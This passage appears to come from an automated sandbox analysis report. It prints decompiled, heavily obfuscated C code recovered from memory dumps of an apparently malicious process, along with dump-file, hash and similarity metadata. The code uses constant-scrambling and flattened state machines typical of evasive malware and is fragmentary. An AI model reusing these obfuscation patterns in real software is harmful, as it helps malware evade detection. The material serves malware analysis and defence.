                                                      				_v152 = _v152 << 3;
                                                      				_v152 = _v152 ^ 0x00050e88;
                                                      				_v180 = 0xd511;
                                                      				_v180 = _v180 ^ 0x1d80f702;
                                                      				_v180 = _v180 << 0xe;
                                                      				_v180 = _v180 ^ 0xe181230f;
                                                      				_v180 = _v180 ^ 0xe905cae0;
                                                      				_v92 = 0xc43e;
                                                      				_v92 = _v92 + 0xffff1ae3;
                                                      				_v92 = _v92 ^ 0xffffb82c;
                                                      				_v104 = 0x4365;
                                                      				_v104 = _v104 >> 5;
                                                      				_v104 = _v104 >> 9;
                                                      				_v104 = _v104 ^ 0x000066ec;
                                                      				_v172 = 0xf4f1;
                                                      				_v172 = _v172 + 0x10b4;
                                                      				_v172 = _v172 + 0xffffc378;
                                                      				_v172 = _v172 / _t349;
                                                      				_v172 = _v172 ^ 0x000074e7;
                                                      				_v116 = 0x37b8;
                                                      				_v116 = _v116 + 0xffff57e4;
                                                      				_v116 = _v116 + 0xb626;
                                                      				_v116 = _v116 ^ 0x0000140c;
                                                      				_v144 = 0xb795;
                                                      				_t350 = 0x49;
                                                      				_v144 = _v144 * 0x50;
                                                      				_v144 = _v144 / _t350;
                                                      				_v144 = _v144 ^ 0x000091bc;
                                                      				_v76 = 0x1dd7;
                                                      				_t351 = 0x1c;
                                                      				_v76 = _v76 * 0x75;
                                                      				_v76 = _v76 ^ 0x000d9fef;
                                                      				_v108 = 0xced7;
                                                      				_v108 = _v108 >> 5;
                                                      				_v108 = _v108 / _t351;
                                                      				_v108 = _v108 ^ 0x00005a08;
                                                      				_v136 = 0x2b88;
                                                      				_v136 = _v136 ^ 0x78d809e4;
                                                      				_v136 = _v136 >> 0xe;
                                                      				_v136 = _v136 ^ 0x0001f73d;
                                                      				_v164 = 0x766d;
                                                      				_v164 = _v164 >> 1;
                                                      				_v164 = _v164 + 0xffffabb8;
                                                      				_t352 = 0x72;
                                                      				_v164 = _v164 * 0x5c;
                                                      				_v164 = _v164 ^ 0xfff6cd9c;
                                                      				_v168 = 0x718b;
                                                      				_v168 = _v168 ^ 0xcaa0facc;
                                                      				_v168 = _v168 ^ 0xed5841e4;
                                                      				_t112 =  &_v168; // 0xed5841e4
                                                      				_v168 =  *_t112 * 0x1f;
                                                      				_v168 = _v168 ^ 0xd720c943;
                                                      				_v100 = 0x3093;
                                                      				_v100 = _v100 << 8;
                                                      				_v100 = _v100 * 0x6e;
                                                      				_v100 = _v100 ^ 0x14df3334;
                                                      				_v80 = 0xaa77;
                                                      				_v80 = _v80 | 0xec49ccd9;
                                                      				_v80 = _v80 ^ 0xec49f00b;
                                                      				_v184 = 0x6ab1;
                                                      				_v184 = _v184 << 0x10;
                                                      				_v184 = _v184 + 0x7c9;
                                                      				_v184 = _v184 + 0xb8a8;
                                                      				_v184 = _v184 ^ 0x6ab1ec4b;
                                                      				_v96 = 0xf4af;
                                                      				_v96 = _v96 * 0x3a;
                                                      				_v96 = _v96 >> 9;
                                                      				_v96 = _v96 ^ 0x00007d4d;
                                                      				_v188 = 0xb63a;
                                                      				_v188 = _v188 ^ 0x365cf355;
                                                      				_v188 = _v188 << 2;
                                                      				_v188 = _v188 + 0xd6ce;
                                                      				_v188 = _v188 ^ 0xd971d569;
                                                      				_v120 = 0xab3a;
                                                      				_v120 = _v120 * 0x32;
                                                      				_v120 = _v120 / _t352;
                                                      				_v120 = _v120 ^ 0x00002a91;
                                                      				_v156 = 0xadc6;
                                                      				_v156 = _v156 >> 9;
                                                      				_v156 = _v156 + 0xffff5d43;
                                                      				_v156 = _v156 ^ 0xffff767e;
                                                      				_v128 = 0x4e26;
                                                      				_t353 = 0x54;
                                                      				_v128 = _v128 / _t353;
                                                      				_v128 = _v128 ^ 0xbd5b2ebf;
                                                      				_v128 = _v128 ^ 0xbd5b3d92;
                                                      				_v112 = 0x5bd4;
                                                      				_v112 = _v112 | 0xfffbefdf;
                                                      				_v112 = _v112 ^ 0xfffb9ace;
                                                      				_v88 = 0x9c25;
                                                      				_v88 = _v88 | 0xd782555b;
                                                      				_v88 = _v88 ^ 0xd782aa4a;
                                                      				_v140 = 0x1cfa;
                                                      				_v140 = _v140 >> 1;
                                                      				_t354 = 0x5d;
                                                      				_v140 = _v140 / _t354;
                                                      				_v140 = _v140 ^ 0x0000306c;
                                                      				_v148 = 0xedd7;
                                                      				_v148 = _v148 ^ 0xabf54283;
                                                      				_t355 = 0x30;
                                                      				_v148 = _v148 / _t355;
                                                      				_v148 = _v148 ^ 0x03952150;
                                                      				_v124 = 0xb354;
                                                      				_v124 = _v124 + 0xffffd7c7;
                                                      				_v124 = _v124 + 0x3a29;
                                                      				_v124 = _v124 ^ 0x0000d052;
                                                      				_v132 = 0x3532;
                                                      				_v132 = _v132 >> 0xb;
                                                      				_v132 = _v132 | 0xce8e7aaf;
                                                      				_v132 = _v132 ^ 0xce8e32c4;
                                                      				_v160 = 0x7409;
                                                      				_v160 = _v160 | 0x6d9a42b1;
                                                      				_v160 = _v160 + 0xffff6faf;
                                                      				_v160 = _v160 >> 2;
                                                      				_v160 = _v160 ^ 0x1b6641d5;
                                                      				_v84 = 0xb2d5;
                                                      				_v84 = _v84 * 0x47;
                                                      				_v84 = _v84 ^ 0x0031fe78;
                                                      				do {
                                                      					while(_t322 != 0x94ffda2) {
                                                      						if(_t322 == 0x11e75ef4) {
                                                      							_t317 = E00232833(_v180,  &_v72, _v92, _a8, _v104, _v172);
                                                      							_t360 =  &(_t360[5]);
                                                      							__eflags = _t317;
                                                      							if(_t317 != 0) {
                                                      								_t322 = 0x94ffda2;
                                                      								continue;
                                                      							}
                                                      						} else {
                                                      							if(_t322 == 0x3336903c) {
                                                      								E0024337D(_v124, _v72, _v132, _v160, _v84);
                                                      							} else {
                                                      								if(_t322 != 0x3701c77e) {
                                                      									goto L9;
                                                      								} else {
                                                      									_t322 = 0x11e75ef4;
                                                      									continue;
                                                      								}
                                                      							}
                                                      						}
                                                      						L12:
                                                      						return _t357;
                                                      					}
                                                      					E002493A8(_v116, _v144, _v76,  &_v68, 0x44, _v108);
                                                      					_push(_v164);
                                                      					_v68 = 0x44;
                                                      					_v60 = E0024889D(0x24c000, _v136, __eflags);
                                                      					__eflags = _v152 | _v176;
                                                      					_t357 = E00237AB1(_v168, _a16, 0x24c000, 0x24c000, _v152 | _v176, _v100, 0x24c000, 0x24c000, _v80, _v184, _v96, _a28, 0, _a8, _v188, _v120, _v72, _v156, _v128, _v112,  &_v68);
                                                      					E00242025(_v88, _v60, _v140, _v148);
                                                      					_t360 =  &(_t360[0x1a]);
                                                      					_t322 = 0x3336903c;
                                                      					L9:
                                                      					__eflags = _t322 - 0x294b0e13;
                                                      				} while (_t322 != 0x294b0e13);
                                                      				goto L12;
                                                      			}


                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: t$):$.)$25$D$M}$l0$AX$f$t$tI
                                                      • API String ID: 0-3778435269
                                                      • Opcode ID: f9fe4e7595adbafd0c415ec7addbff66a690945b58ca593ded39d2991255ef24
                                                      • Instruction ID: 472d332c45b494aa0fd804a7faceb257eaac6d3870ed1fc731aba12a1452282e
                                                      • Opcode Fuzzy Hash: f9fe4e7595adbafd0c415ec7addbff66a690945b58ca593ded39d2991255ef24
                                                      • Instruction Fuzzy Hash: 5ED102B15083819FE368CF65C889A1FFBE1BBC4758F10891DF29A96260D7B58949CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E00248F49() {
                                                      				char _v520;
                                                      				char _v1040;
                                                      				signed int _v1044;
                                                      				intOrPtr _v1048;
                                                      				signed int _v1052;
                                                      				signed int _v1056;
                                                      				signed int _v1060;
                                                      				signed int _v1064;
                                                      				signed int _v1068;
                                                      				signed int _v1072;
                                                      				signed int _v1076;
                                                      				signed int _v1080;
                                                      				signed int _v1084;
                                                      				signed int _v1088;
                                                      				signed int _v1092;
                                                      				signed int _v1096;
                                                      				signed int _v1100;
                                                      				signed int _v1104;
                                                      				signed int _v1108;
                                                      				signed int _v1112;
                                                      				signed int _v1116;
                                                      				signed int _v1120;
                                                      				signed int _v1124;
                                                      				signed int _v1128;
                                                      				signed int _v1132;
                                                      				signed int _v1136;
                                                      				signed int _v1140;
                                                      				signed int _v1144;
                                                      				void* _t238;
                                                      				void* _t239;
                                                      				void* _t240;
                                                      				void* _t245;
                                                      				signed int _t249;
                                                      				signed int _t250;
                                                      				signed int _t251;
                                                      				signed int _t252;
                                                      				signed int _t253;
                                                      				intOrPtr _t258;
                                                      				void* _t264;
                                                      				intOrPtr _t282;
                                                      				void* _t286;
                                                      				signed int* _t290;
                                                      
                                                      				_t290 =  &_v1144;
                                                      				_v1044 = _v1044 & 0x00000000;
                                                      				_v1048 = 0x4ebe6;
                                                      				_v1128 = 0x778f;
                                                      				_v1128 = _v1128 | 0xa1323825;
                                                      				_t249 = 0x13;
                                                      				_v1128 = _v1128 / _t249;
                                                      				_v1128 = _v1128 << 2;
                                                      				_t286 = 0x35c963e4;
                                                      				_v1128 = _v1128 ^ 0x21ef9208;
                                                      				_v1052 = 0x4cd;
                                                      				_v1052 = _v1052 | 0x68cff677;
                                                      				_v1052 = _v1052 ^ 0x68cf93fd;
                                                      				_v1092 = 0x77ae;
                                                      				_v1092 = _v1092 >> 0xa;
                                                      				_v1092 = _v1092 ^ 0x00005fc7;
                                                      				_v1060 = 0x2f45;
                                                      				_v1060 = _v1060 | 0xa1a9613d;
                                                      				_v1060 = _v1060 ^ 0xa1a96f30;
                                                      				_v1096 = 0x6d0d;
                                                      				_v1096 = _v1096 << 2;
                                                      				_v1096 = _v1096 | 0xf85e23e8;
                                                      				_v1096 = _v1096 ^ 0xf85f94d5;
                                                      				_v1136 = 0xe906;
                                                      				_t250 = 0x4b;
                                                      				_v1136 = _v1136 * 0x76;
                                                      				_v1136 = _v1136 + 0x8e3a;
                                                      				_v1136 = _v1136 << 8;
                                                      				_v1136 = _v1136 ^ 0x6bf6f1e6;
                                                      				_v1104 = 0x5e2e;
                                                      				_v1104 = _v1104 >> 0xd;
                                                      				_v1104 = _v1104 * 0x2c;
                                                      				_v1104 = _v1104 ^ 0x0000496b;
                                                      				_v1144 = 0xf2e9;
                                                      				_v1144 = _v1144 + 0xd50c;
                                                      				_v1144 = _v1144 / _t250;
                                                      				_v1144 = _v1144 ^ 0x9fddb036;
                                                      				_v1144 = _v1144 ^ 0x9fdde12f;
                                                      				_v1108 = 0x6902;
                                                      				_v1108 = _v1108 | 0xfbe10d26;
                                                      				_v1108 = _v1108 * 0x44;
                                                      				_v1108 = _v1108 ^ 0xe7e09cc2;
                                                      				_v1120 = 0xf3f1;
                                                      				_v1120 = _v1120 + 0xffff8a4f;
                                                      				_v1120 = _v1120 >> 6;
                                                      				_v1120 = _v1120 * 0x67;
                                                      				_v1120 = _v1120 ^ 0x0000b01d;
                                                      				_v1088 = 0xb368;
                                                      				_v1088 = _v1088 + 0x9734;
                                                      				_v1088 = _v1088 ^ 0x00010c20;
                                                      				_v1076 = 0x650d;
                                                      				_v1076 = _v1076 ^ 0x0544b8d8;
                                                      				_v1076 = _v1076 ^ 0x054483f2;
                                                      				_v1056 = 0xabff;
                                                      				_v1056 = _v1056 ^ 0x935518d0;
                                                      				_v1056 = _v1056 ^ 0x9355abf6;
                                                      				_v1068 = 0xb772;
                                                      				_v1068 = _v1068 << 2;
                                                      				_v1068 = _v1068 ^ 0x00028ed1;
                                                      				_v1124 = 0xbc7e;
                                                      				_v1124 = _v1124 * 0x39;
                                                      				_v1124 = _v1124 + 0x3dff;
                                                      				_v1124 = _v1124 ^ 0x966a7207;
                                                      				_v1124 = _v1124 ^ 0x9640526c;
                                                      				_v1132 = 0xba5f;
                                                      				_v1132 = _v1132 << 0xb;
                                                      				_v1132 = _v1132 << 5;
                                                      				_t251 = 0x75;
                                                      				_v1132 = _v1132 / _t251;
                                                      				_v1132 = _v1132 ^ 0x0197c6fa;
                                                      				_v1140 = 0x5fea;
                                                      				_t252 = 0x3c;
                                                      				_v1140 = _v1140 * 0xa;
                                                      				_v1140 = _v1140 * 0x2d;
                                                      				_v1140 = _v1140 >> 2;
                                                      				_v1140 = _v1140 ^ 0x002a725f;
                                                      				_v1100 = 0x79ec;
                                                      				_v1100 = _v1100 << 8;
                                                      				_v1100 = _v1100 ^ 0x69f808d7;
                                                      				_v1100 = _v1100 ^ 0x69818172;
                                                      				_v1084 = 0xd5eb;
                                                      				_v1084 = _v1084 ^ 0xb139babe;
                                                      				_v1084 = _v1084 ^ 0xb1392951;
                                                      				_v1072 = 0x4dbe;
                                                      				_v1072 = _v1072 ^ 0x00003bef;
                                                      				_v1080 = 0x7ef4;
                                                      				_v1080 = _v1080 / _t252;
                                                      				_v1080 = _v1080 ^ 0x00000c75;
                                                      				_v1112 = 0xcb8d;
                                                      				_v1112 = _v1112 + 0x5361;
                                                      				_v1112 = _v1112 + 0xffffff0c;
                                                      				_v1112 = _v1112 ^ 0x00015b8c;
                                                      				_v1064 = 0xba20;
                                                      				_v1064 = _v1064 ^ 0x3b22f3f3;
                                                      				_v1064 = _v1064 ^ 0x3b2222af;
                                                      				_v1116 = 0xa287;
                                                      				_v1116 = _v1116 + 0x9065;
                                                      				_t253 = 0x5f;
                                                      				_v1116 = _v1116 / _t253;
                                                      				_v1116 = _v1116 + 0xffff8b94;
                                                      				_v1116 = _v1116 ^ 0xffffc056;
                                                      				_t238 = E002485BA(_t253);
                                                      				do {
                                                      					while(_t286 != 0x2b67e243) {
                                                      						if(_t286 == 0x35036a43) {
                                                      							_push( &_v1040);
                                                      							_push( &_v520);
                                                      							return E00237B63(_v1064, _v1116, __eflags);
                                                      						}
                                                      						if(_t286 == 0x35c963e4) {
                                                      							_t286 = 0x39b3b44d;
                                                      							continue;
                                                      						}
                                                      						_t295 = _t286 - 0x39b3b44d;
                                                      						if(_t286 != 0x39b3b44d) {
                                                      							goto L8;
                                                      						}
                                                      						_push(_v1092);
                                                      						_t245 = E0024889D(0x24c9b0, _v1052, _t295);
                                                      						_pop(_t264);
                                                      						_t282 =  *0x24ca2c; // 0x698300
                                                      						_t196 = _t282 + 0x230; // 0x7a0043
                                                      						E0023C680(_t196, _v1096, _v1136, _t264, _v1104,  *0x24ca2c, _t245,  &_v520);
                                                      						_t238 = E00242025(_v1144, _t245, _v1108, _v1120);
                                                      						_t290 =  &(_t290[9]);
                                                      						_t286 = 0x2b67e243;
                                                      					}
                                                      					_push(_v1076);
                                                      					_t239 = E0024889D(0x24c980, _v1088, __eflags);
                                                      					_t240 = E00248C8F(_v1056);
                                                      					_t258 =  *0x24ca2c; // 0x698300
                                                      					_t210 = _t258 + 0x230; // 0x698530
                                                      					E002329E3(_t210, 0x104, _t239, _v1124, _v1132, _v1140, _t240,  &_v1040, _v1100, _v1084);
                                                      					_t238 = E00242025(_v1072, _t239, _v1080, _v1112);
                                                      					_t290 =  &(_t290[0xc]);
                                                      					_t286 = 0x35036a43;
                                                      					L8:
                                                      					__eflags = _t286 - 0x38d0088b;
                                                      				} while (__eflags != 0);
                                                      				return _t238;
                                                      			}














































                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: e$m$Cg+$E/$_r*$_r*$aS$kI$;$y
                                                      • API String ID: 0-1402005448
                                                      • Opcode ID: 95cd7e87395356083014d7be14ec61461bbcc7f0e5331402cc79b4c18f156fa1
                                                      • Instruction ID: e1ba25ea2e503b2212303459b9f38eeba743199c744c360f19c4bff692906f9e
                                                      • Opcode Fuzzy Hash: 95cd7e87395356083014d7be14ec61461bbcc7f0e5331402cc79b4c18f156fa1
                                                      • Instruction Fuzzy Hash: CAB1327151D3819FD358CF24C58A40BFBE1FBC8798F208A1DF595862A0D7B98A58CF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 90%
                                                      			E00241773(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				char _v4;
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				void* __ecx;
                                                      				void* _t131;
                                                      				void* _t148;
                                                      				void* _t151;
                                                      				signed int _t162;
                                                      				void* _t164;
                                                      				signed int* _t167;
                                                      
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				E0023602B(_t131);
                                                      				_v32 = 0x943f;
                                                      				_t167 =  &(( &_v64)[6]);
                                                      				_t164 = 0;
                                                      				_t151 = 0x349de80e;
                                                      				_t162 = 0x48;
                                                      				_v32 = _v32 * 0x69;
                                                      				_v32 = _v32 ^ 0x003ccdd6;
                                                      				_v56 = 0x5d22;
                                                      				_v56 = _v56 << 0xb;
                                                      				_v56 = _v56 * 0x6c;
                                                      				_v56 = _v56 >> 0xc;
                                                      				_v56 = _v56 ^ 0x0003a52d;
                                                      				_v48 = 0xb9ad;
                                                      				_v48 = _v48 / _t162;
                                                      				_v48 = _v48 | 0x8e45101b;
                                                      				_v48 = _v48 ^ 0xce45129f;
                                                      				_v16 = 0x4535;
                                                      				_v16 = _v16 + 0xffff440f;
                                                      				_v16 = _v16 ^ 0xbfff8944;
                                                      				_v24 = 0xd710;
                                                      				_v24 = _v24 << 4;
                                                      				_v24 = _v24 ^ 0x000d4c75;
                                                      				_v44 = 0x65fd;
                                                      				_v44 = _v44 >> 2;
                                                      				_v44 = _v44 | 0x32207922;
                                                      				_v44 = _v44 ^ 0x322078de;
                                                      				_v28 = 0xded8;
                                                      				_v28 = _v28 ^ 0x86a01735;
                                                      				_v28 = _v28 ^ 0x86a0c6d1;
                                                      				_v64 = 0xdb93;
                                                      				_v64 = _v64 + 0x597e;
                                                      				_v64 = _v64 << 0xa;
                                                      				_v64 = _v64 << 0xa;
                                                      				_v64 = _v64 ^ 0x5110354e;
                                                      				_v60 = 0x2ada;
                                                      				_v60 = _v60 | 0x1c3e2a8f;
                                                      				_v60 = _v60 + 0xf49a;
                                                      				_v60 = _v60 ^ 0xe6209c52;
                                                      				_v60 = _v60 ^ 0xfa1f8dfc;
                                                      				_v20 = 0xdaa6;
                                                      				_v20 = _v20 + 0xb461;
                                                      				_v20 = _v20 ^ 0x0001dcca;
                                                      				_v40 = 0x4872;
                                                      				_v40 = _v40 >> 0xe;
                                                      				_v40 = _v40 ^ 0xb451885a;
                                                      				_v40 = _v40 ^ 0xb451b970;
                                                      				_v36 = 0x262e;
                                                      				_v36 = _v36 >> 0xf;
                                                      				_v36 = _v36 + 0x6428;
                                                      				_v36 = _v36 ^ 0x00003c11;
                                                      				_v8 = 0x6e80;
                                                      				_v8 = _v8 << 0xc;
                                                      				_v8 = _v8 ^ 0x06e82b80;
                                                      				_v12 = 0x3e9d;
                                                      				_v12 = _v12 >> 3;
                                                      				_v12 = _v12 ^ 0x00005153;
                                                      				_v52 = 0x8462;
                                                      				_v52 = _v52 ^ 0xcdf70fa2;
                                                      				_v52 = _v52 ^ 0xe5a9b23c;
                                                      				_v52 = _v52 | 0x26296c1d;
                                                      				_v52 = _v52 ^ 0x2e7f2e4a;
                                                      				do {
                                                      					while(_t151 != 0x6cb1230) {
                                                      						if(_t151 == 0x944062a) {
                                                      							_push(_t151);
                                                      							_push(_t151);
                                                      							_t164 = E00238736(_v4 + _v4);
                                                      							if(_t164 != 0) {
                                                      								_t151 = 0x6cb1230;
                                                      								continue;
                                                      							}
                                                      						} else {
                                                      							if(_t151 == 0x30a4ce3e) {
                                                      								_t148 = E002477A3(_a4,  &_v4, _v24, _v44, _a8, _v28, 0, _v64, _v48 | _v32);
                                                      								_t167 =  &(_t167[7]);
                                                      								if(_t148 != 0) {
                                                      									_t151 = 0x944062a;
                                                      									continue;
                                                      								}
                                                      							} else {
                                                      								if(_t151 != 0x349de80e) {
                                                      									goto L11;
                                                      								} else {
                                                      									_t151 = 0x30a4ce3e;
                                                      									continue;
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L12;
                                                      					}
                                                      					E002477A3(_a4,  &_v4, _v36, _v8, _a8, _v12, _t164, _v52, _v16 | _v56);
                                                      					_t167 =  &(_t167[7]);
                                                      					_t151 = 0x222ae378;
                                                      					L11:
                                                      				} while (_t151 != 0x222ae378);
                                                      				L12:
                                                      				return _t164;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "]$"y 2$(d$5E$SQ$rH$uL$x*"$x*"$~Y
                                                      • API String ID: 0-656425227
                                                      • Opcode ID: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
                                                      • Instruction ID: 434dcaf6484d95d6b8429c07964260ddd04c56ef0452b2183bca049d8c4d874a
                                                      • Opcode Fuzzy Hash: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
                                                      • Instruction Fuzzy Hash: FF6121721093429FD358CF60C89982BFBE1BBD5788F104A1DF69696260C3B5CA58CF83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
                                                      • CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
                                                      • CoTaskMemAlloc.OLE32(?), ref: 10002782
                                                      • CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
                                                      • CoTaskMemFree.OLE32(00000000), ref: 100027CC
                                                      • CoTaskMemFree.OLE32(?), ref: 100027D6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: Task$BinaryCryptFreeString$AllocPropSerializeVariant
                                                      • String ID: o
                                                      • API String ID: 207024522-3306556724
                                                      • Opcode ID: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
                                                      • Instruction ID: 41362f2d7e868ca1a04e6972f66fe0b1fe61006e645ec082c551d45625b46eb2
                                                      • Opcode Fuzzy Hash: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
                                                      • Instruction Fuzzy Hash: 1E114F7BD00129BBEB119BA4CC44EDE7BB9EF447A1F124162FD45E7224DB318E409AE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 83%
                                                      			E00242B16(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
                                                      				char _v520;
                                                      				char _v1040;
                                                      				short _v1584;
                                                      				short _v1586;
                                                      				char _v1588;
                                                      				signed int _v1632;
                                                      				signed int _v1636;
                                                      				unsigned int _v1640;
                                                      				signed int _v1644;
                                                      				signed int _v1648;
                                                      				signed int _v1652;
                                                      				signed int _v1656;
                                                      				signed int _v1660;
                                                      				signed int _v1664;
                                                      				signed int _v1668;
                                                      				signed int _v1672;
                                                      				signed int _v1676;
                                                      				signed int _v1680;
                                                      				signed int _v1684;
                                                      				signed int _v1688;
                                                      				signed int _v1692;
                                                      				signed int _v1696;
                                                      				unsigned int _v1700;
                                                      				signed int _v1704;
                                                      				signed int _v1708;
                                                      				signed int _v1712;
                                                      				signed int _v1716;
                                                      				signed int _v1720;
                                                      				signed int _v1724;
                                                      				signed int _v1728;
                                                      				signed int _v1732;
                                                      				signed int _v1736;
                                                      				signed int _v1740;
                                                      				signed int _v1744;
                                                      				signed int _v1748;
                                                      				signed int _v1752;
                                                      				signed int _v1756;
                                                      				signed int _v1760;
                                                      				void* __edx;
                                                      				void* _t314;
                                                      				signed int _t340;
                                                      				signed int _t342;
                                                      				signed int _t346;
                                                      				void* _t348;
                                                      				void* _t354;
                                                      				signed int _t358;
                                                      				void* _t360;
                                                      				void* _t389;
                                                      				signed int _t400;
                                                      				signed int _t401;
                                                      				signed int _t402;
                                                      				signed int _t403;
                                                      				signed int _t404;
                                                      				void* _t408;
                                                      				void* _t409;
                                                      
                                                      				_push(_a20);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0023602B(_t314);
                                                      				_v1672 = 0x92f4;
                                                      				_t409 = _t408 + 0x1c;
                                                      				_t354 = 0x3181563a;
                                                      				_t400 = 0x5d;
                                                      				_v1672 = _v1672 / _t400;
                                                      				_v1672 = _v1672 ^ 0xa72c55b3;
                                                      				_v1672 = _v1672 ^ 0xa72c5437;
                                                      				_v1736 = 0x461f;
                                                      				_v1736 = _v1736 + 0xd353;
                                                      				_v1736 = _v1736 + 0xffff7400;
                                                      				_v1736 = _v1736 + 0xffff12e8;
                                                      				_v1736 = _v1736 ^ 0xffffeb08;
                                                      				_v1684 = 0x12ca;
                                                      				_v1684 = _v1684 + 0xffffbd30;
                                                      				_v1684 = _v1684 + 0xc084;
                                                      				_v1684 = _v1684 ^ 0x00009b25;
                                                      				_v1700 = 0x68fe;
                                                      				_v1700 = _v1700 >> 0x10;
                                                      				_v1700 = _v1700 >> 0xf;
                                                      				_v1700 = _v1700 ^ 0x000058ac;
                                                      				_v1676 = 0xc4c1;
                                                      				_v1676 = _v1676 + 0x377e;
                                                      				_v1676 = _v1676 + 0xffff6b29;
                                                      				_v1676 = _v1676 ^ 0x0000377c;
                                                      				_v1708 = 0x7055;
                                                      				_v1708 = _v1708 << 0xe;
                                                      				_v1708 = _v1708 ^ 0x1eb23ae3;
                                                      				_v1708 = _v1708 ^ 0x02a72f08;
                                                      				_v1648 = 0x750a;
                                                      				_v1648 = _v1648 | 0xec573941;
                                                      				_v1648 = _v1648 ^ 0xec5707ed;
                                                      				_v1744 = 0xfcbf;
                                                      				_t401 = 0x2c;
                                                      				_v1744 = _v1744 * 0x3d;
                                                      				_v1744 = _v1744 >> 0xd;
                                                      				_v1744 = _v1744 / _t401;
                                                      				_v1744 = _v1744 ^ 0x00003058;
                                                      				_v1636 = 0x9933;
                                                      				_v1636 = _v1636 << 3;
                                                      				_v1636 = _v1636 ^ 0x0004b1ef;
                                                      				_v1668 = 0xb76d;
                                                      				_v1668 = _v1668 | 0xef4f757f;
                                                      				_v1668 = _v1668 ^ 0xef4ff671;
                                                      				_v1656 = 0xf145;
                                                      				_v1656 = _v1656 + 0x1194;
                                                      				_v1656 = _v1656 ^ 0x00010bb0;
                                                      				_v1752 = 0xf3e9;
                                                      				_t402 = 0x49;
                                                      				_v1752 = _v1752 / _t402;
                                                      				_v1752 = _v1752 + 0x9c03;
                                                      				_v1752 = _v1752 + 0xffffb211;
                                                      				_v1752 = _v1752 ^ 0x000027fb;
                                                      				_v1728 = 0x648a;
                                                      				_v1728 = _v1728 ^ 0x1010be16;
                                                      				_v1728 = _v1728 * 0x14;
                                                      				_v1728 = _v1728 | 0x258edfa9;
                                                      				_v1728 = _v1728 ^ 0x65dfe7b9;
                                                      				_v1688 = 0x4eab;
                                                      				_v1688 = _v1688 << 0xa;
                                                      				_v1688 = _v1688 | 0x3ca08384;
                                                      				_v1688 = _v1688 ^ 0x3dba9eb2;
                                                      				_v1756 = 0xd2f4;
                                                      				_t403 = 0x23;
                                                      				_v1756 = _v1756 / _t403;
                                                      				_v1756 = _v1756 ^ 0xcde225b2;
                                                      				_t404 = 0x6e;
                                                      				_v1756 = _v1756 / _t404;
                                                      				_v1756 = _v1756 ^ 0x01df76bd;
                                                      				_v1760 = 0x6cd1;
                                                      				_v1760 = _v1760 * 0x7d;
                                                      				_v1760 = _v1760 ^ 0x8e200a23;
                                                      				_v1760 = _v1760 >> 3;
                                                      				_v1760 = _v1760 ^ 0x11c2d811;
                                                      				_v1640 = 0xac3a;
                                                      				_v1640 = _v1640 >> 3;
                                                      				_v1640 = _v1640 ^ 0x00004856;
                                                      				_v1748 = 0x4fc2;
                                                      				_v1748 = _v1748 >> 0xf;
                                                      				_v1748 = _v1748 * 0x31;
                                                      				_v1748 = _v1748 ^ 0x38a83a44;
                                                      				_v1748 = _v1748 ^ 0x38a82be9;
                                                      				_v1680 = 0xb86a;
                                                      				_v1680 = _v1680 | 0x02231922;
